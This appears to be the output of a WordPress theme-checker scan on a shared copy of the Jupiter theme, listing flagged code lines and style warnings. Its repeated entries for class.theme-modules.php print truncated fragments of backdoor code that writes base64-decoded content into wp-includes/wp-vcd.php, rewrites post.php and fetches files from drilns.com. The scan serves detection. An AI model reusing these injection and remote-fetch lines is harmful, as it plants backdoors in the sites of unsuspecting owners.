    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_get_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne111: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne138: if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne171: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne177: $content = @file_get_contents('http://www.drilns.com/o.php?host=' . $_SERVER['HTTP_HOST
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.drilns.com/admin.txt'));
    Ligne202: if ($file = file_get_contents($e[1]))
    Ligne217: if ($file = @file_get_contents(__FILE__))
    file_put_contents was found in the file class.theme-modules.php
    Ligne45: if ( ($file = file_get_contents($path . '/wp-includes/post.php')) && (file_put_contents($path . '/wp-includes/wp-vcd.php', base64_decode($GLOBALS
    Ligne49: file_put_contents($path . '/wp-includes/post.php', $file);
    Ligne50: //@file_put_contents($path . '/wp-includes/class.wp.php', file_get_contents('h
    Ligne116: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne143: @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR 
    Ligne172: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne178: //@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('
    Ligne221: @file_put_contents(__FILE__, $file);
    file_get_contents was found in the file mk_banner_builder.php
    Ligne7: $html = file_get_contents( $path . '/template.php' );
    file_get_contents was found in the file mk_category.php
    Ligne8: $html = file_get_contents($path . '/template.php');
    file_get_contents was found in the file mk_ornamental_title.php
    Ligne7: $html = file_get_contents( $path . '/template.php' );
    file_get_contents was found in the file mk_font_icons.php
    Ligne6: $html = file_get_contents( $path . '/template.php' );
    file_get_contents was found in the file vc_twitter.php
    Ligne7: $html = file_get_contents($path . '/template.php');
    file_get_contents was found in the file mk_custom_box.php
    Ligne7: $html = file_get_contents( $path . '/template.php' );
    file_get_contents was found in the file mk_chart.php
    Ligne8: $html = file_get_contents( $path . '/template.php' );
    file_get_contents was found in the file mk_image_switch.php
    Ligne6: $html = file_get_contents( $path . '/template.php' );
    file_get_contents was found in the file mk_icon_box_gradient.php
    Ligne7: $html = file_get_contents( $path . '/template.php' );
    file_get_contents was found in the file mk_circle_image.php
    Ligne5: $html = file_get_contents( $path . '/template.php' );
    file_get_contents was found in the file mk_button_gradient.php
    Ligne8: $html = file_get_contents( $path . '/template.php' );
    file_get_contents was found in the file mk_audio.php
    Ligne7: $html = file_get_contents( $path . '/template.php' );
    file_get_contents was found in the file mk_blockquote.php
    Ligne6: $html = file_get_contents( $path . '/template.php' );
  9. Malware : Network operations curl_exec was found in the file Request.php
    Ligne202: $result = curl_exec($this->_ch);
    curl_init was found in the file Request.php
    Ligne843: $ch = curl_init($this->uri);
    curl_init was found in the file MailChimpApi.php
    Ligne54: if ( ! function_exists( 'curl_init' ) ) {
    Ligne69: $ch = curl_init();
    curl_exec was found in the file MailChimpApi.php
    Ligne82: $result = curl_exec( $ch );
    curl_init was found in the file global.php
    Ligne598: $curl = curl_init( $url );
    Ligne706: if ( is_callable( 'curl_init' ) ) {
    curl_exec was found in the file global.php
    Ligne603: $data = curl_exec( $curl );
    fsockopen was found in the file SSH1.php
    Ligne487: * 10 seconds. It is used by fsockopen() in that function.
    Ligne583: $this->fsock = @fsockopen($this->host, $this->port, $errno, $errstr, $this->connectionTimeo
    fsockopen was found in the file SSH1.php
    Ligne487: * 10 seconds. It is used by fsockopen() in that function.
    Ligne583: $this->fsock = @fsockopen($this->host, $this->port, $errno, $errstr, $this->connectionTimeo
    fsockopen was found in the file SSH2.php
    Ligne1043: $this->fsock = @fsockopen($this->host, $this->port, $errno, $errstr, $this->curTimeout);
    fsockopen was found in the file Agent.php
    Ligne298: $this->fsock = fsockopen('unix://' . $address, 0, $errno, $errstr);
  10. Admin menu : Themes should use add_theme_page() for adding admin pages. File class-tgm-plugin-activation.php :
    Ligne731: $this->page_hook = call_user_func( 'add_submenu_page', $args['parent_slug'], $args['page_title'], $args['menu_t
    File class-theme-options.php :
    Ligne23: add_submenu_page(
    File class-mkhb-main.php :
    Ligne99: add_submenu_page( THEME_NAME, __( 'Header Builder', 'mk_framework' ), __( '
    File functions.php :
    Ligne320: add_menu_page(
    File functions.php :
    Ligne327: add_submenu_page(
    Ligne335: add_submenu_page(
    Ligne341: add_submenu_page(
    File functions.php :
    Ligne327: add_submenu_page(
    Ligne335: add_submenu_page(
    Ligne341: add_submenu_page(
    File functions.php :
    Ligne327: add_submenu_page(
    Ligne335: add_submenu_page(
    Ligne341: add_submenu_page(
  11. Hidden admin bar : Hidden admin Bar Themes should not hide admin bar. Detected in file : navigation-preview.php.
Warning
  1. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  2. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is jupiter-shared-by-vestathemes-com.
  3. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function _x, with the arguments 'URL slug', 'mk_framework' in file config.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'URL slug', 'mk_framework' in file config.php.Found a translation function that is missing a text-domain. Function _x, with the arguments 'URL slug', 'mk_framework' in file config.php.Found a translation function that is missing a text-domain. Function esc_html_e, with the arguments 'mk_framework' in file updates-downgrades.php.Found a translation function that is missing a text-domain. Function esc_html_e, with the arguments in file register-product.php.Found a translation function that is missing a text-domain. Function esc_html_e, with the arguments in file register-product.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'mk_framework' in file validator-class.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Cannot import auto-draft posts' in file class-wxr-importer.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Skipping attachment "%s", fetching attachments disabled' in file class-wxr-importer.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Headers' in file class-mkhb-post-type.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Header' in file class-mkhb-post-type.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Header Revisions' in file class-mkhb-post-type.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Header Revision' in file class-mkhb-post-type.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Invalid post ID.' in file post.php.Found a translation function that is missing a text-domain. Function __, with the arguments 'Cannot create a revision of a revision' in file post.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are woocommerce, mk_framework, default, wordpress-importer, mk-framework, js_composer.
  4. Plugin territory : Plugin territory functionalitiesThe theme uses the register_post_type() function, which is plugin-territory functionality.The theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  5. Line endings consistency : Both DOS and UNIX style line endingsFound a mix of \r\n and \n line endings in file sidebar.php.
  6. Hidden admin bar : Hidden admin Bar in CSSThemes should not hide admin bar. Detected in file core-styles.6.1.4.css.
  7. Custom elements : Presence of custom headerNo reference to custom header was found in the theme.
  8. Custom elements : Presence of custom backgroundNo reference to custom background was found in the theme.
  9. Editor style : Presence of editor styleNo reference to add_editor_style() was found in the theme. It is recommended that the theme implements editor styling, so as to make the editor content match the resulting post output in the theme, for a better user experience.
  10. I18N implementation : Proper use of _e(Possible variable $button_text found in translation function in updates-downgrades.php. Translation function calls should not contain PHP variables. Possible variable $api_key found in translation function in register-product.php. Translation function calls should not contain PHP variables.
  11. I18N implementation : Proper use of ___all(Possible variable $message found in translation function in validator-class.php. Translation function calls should not contain PHP variables.
  12. I18N implementation : Proper use of _x(Possible variable $news_slug found in translation function in config.php. Translation function calls should not contain PHP variables. Possible variable $portfolio_slug found in translation function in config.php. Translation function calls should not contain PHP variables. Possible variable $portfolio_cat_slug found in translation function in config.php. Translation function calls should not contain PHP variables.
  13. I18N implementation : Proper use of esc_html_e(Possible variable $button_text found in translation function in updates-downgrades.php. Translation function calls should not contain PHP variables. Possible variable $api_key found in translation function in register-product.php. Translation function calls should not contain PHP variables.
  14. Screenshot : Screenshot fileBad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in wp_head.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  3. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  4. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  5. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  6. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  7. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  8. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  9. Use of includes : Use of include or requireThe theme appears to use include or require : hooks.php
    Ligne17: require_once (THEME_INCLUDES . '/woocommerce-quantity-increment/woocommerce
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : bootstrap.php
    Ligne3: require(__DIR__ . '/src/Httpful/Bootstrap.php');
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : HttpfulTest.php
    Ligne12: require(dirname(dirname(dirname(__FILE__))) . '/bootstrap.php');
